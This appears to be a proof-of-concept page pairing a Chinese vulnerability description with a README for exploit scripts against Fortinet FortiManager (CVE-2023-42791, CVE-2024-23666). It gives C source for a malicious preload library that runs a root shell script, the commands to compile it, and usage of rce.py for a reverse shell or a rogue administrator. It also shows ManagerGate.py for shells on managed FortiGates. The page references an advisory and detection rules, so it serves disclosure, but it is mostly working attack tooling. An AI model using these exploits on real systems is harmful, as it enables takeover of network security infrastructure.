Fortinet FortiManager和FortiAnalyzer 安全漏洞
描述:Fortinet FortiManager和Fortinet FortiAnalyzer都是美国飞塔(Fortinet)公司的产品。Fortinet FortiManager是一套集中化网络安全管理平台。该平台支持集中管理任意数量的Fortinet设备,并能够将设备分组到不同的管理域(ADOM)进一步简化多设备安全部署与管理。Fortinet FortiAnalyzer是一套集中式网络安全报告解决方案。该产品主要用于收集网络日志数据,并通过报告套件对日志中的安全事件、网络流量、Web内容等进行分析、报告、
Exploitations scripts for CVE-2023-42791 and CVE-2024-23666.
# Fortimanager insufficient authorization checks (CVE-2024-23666) and unrestricted file upload (CVE-2023-42791) exploitation scripts
Two exploitation scripts leveraging these vulnerabilities are provided:
- `rce.py`: Provides a reverse shell or adds an arbitrary administrator from unprivileged access to the FortiManager.
- `ManagerGate.py`: Allows connecting to remote managed FortiGate SSH services. SSH passwords are still needed but can be found in the FortiManager configuration backup.
For more details, please refer to the associated advisory available at https://www.synacktiv.com/advisories/advisories/fortimanager-multiple-vulnerabilities
## Usage
### rce.py
Compile a malicious library that will run `/rce.sh`:
$ cat rce.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
if (getuid() != 0) return 0;
if (fork() == 0) {
system("/bin/bash /rce.sh");
return 0;
$ gcc -fPIC -shared -o rce.so rce.c -nostartfiles
$ python3 rce.py -h
usage: rce.py [-h] [-k] [-l LIBRARY] connection {revshell,adduser} ...
positional arguments:
connection User, password, and host (user:password@host)
-h, --help show this help message and exit
-k, --insecure Do not check the remote host certificate (default: False)
-l LIBRARY, --library LIBRARY
Malicious library path (default: /tmp/rce.so)
Action to run:
revshell Run a Python reverse shell
adduser Create a new administrator
To obtain a reverse shell:
$ python3 rce.py -k -l ./rce.so lowpriv:password@ revshell 1234
[+] Login to the FortiManager
[+] Uploading /rce.sh
[+] Uploading /rce.so
[+] Uploading /etc/ld.so.preload
[+] Login out of the FortiManager to trigger the RCE
To add a new administrator to the FortiManager:
$ python3 rce.py -k -l ./rce.so lowpriv:password@ adduser malicious_adm password
[+] Login to the FortiManager
[+] Uploading /create_user.txt
[+] Uploading /rce.sh
[+] Uploading /rce.so
[+] Uploading /etc/ld.so.preload
[+] Login out of the FortiManager to trigger the RCE
### ManagerGate.py
$ python3 ManagerGate.py -h
usage: ManagerGate.py [-h] -H HOST -u USER -p PASSWORD [-d DEVICEID] [-i TUNNELIP] [-l] [-x PROXY] -U GU [-v VERBOSE]
get a shell on fortigate
-h, --help show this help message and exit
-H HOST, --host HOST host of the fortimanager
-u USER, --user USER user to connect with to the fortimanager
-p PASSWORD, --password PASSWORD
password to connect to the fortimanager
-d DEVICEID, --deviceid DEVICEID
device oid to get shell
-i TUNNELIP, --tunnelip TUNNELIP
tunnel ip of the fortigate
-l, --local local connect to fortimanager
-x PROXY, --proxy PROXY
proxy request
-U GU, --gu GU user to connect with to the fortigate
-v VERBOSE, --verbose VERBOSE
$ python3 ManagerGate.py -H -u ReadOnlyUser -p MyPassword123 -d 1011 -i -U root
Device OID and tunnel IP of the targeted FortiGates can be found on the FortiManager GUI.
## Affected versions
- CVE-2023-42791
- FortiManager ≤ 7.4.0 ≤ 7.2.3 ≤ 7.0.8 ≤ 6.4.12 ≤ 6.2.11
- CVE-2024-23666
- FortiManager ≤ 7.4.2 ≤ 7.2.5 ≤ 7.0.12 ≤ 6.4.14
- FortiAnalyzer ≤ 7.4.2 ≤ 7.2.5 ≤ 7.0.12 ≤ 6.4.14
- FortiAnalyzer-BigData ≤ 7.4.0 ≤ 7.2.6 7.0.x 6.4.x 6.2.x
## Sigma Detection Rules
Sigma detection rules aimed at detecting use of these exploitation scripts are available in Synacktiv's rules repository: https://github.com/synacktiv/synacktiv-rules/tree/main/2025/fortimanager
## References
- https://www.synacktiv.com/advisories/advisories/fortimanager-multiple-vulnerabilities
- https://fortiguard.fortinet.com/psirt/FG-IR-23-189
- https://fortiguard.fortinet.com/psirt/FG-IR-23-396
[4.0K] /data/pocs/a83d0732467ffd81403f197c1c3e3990a948a23b
├── [4.3K] ManagerGate.py
├── [6.2K] rce.py
└── [4.0K] README.md
0 directories, 3 files
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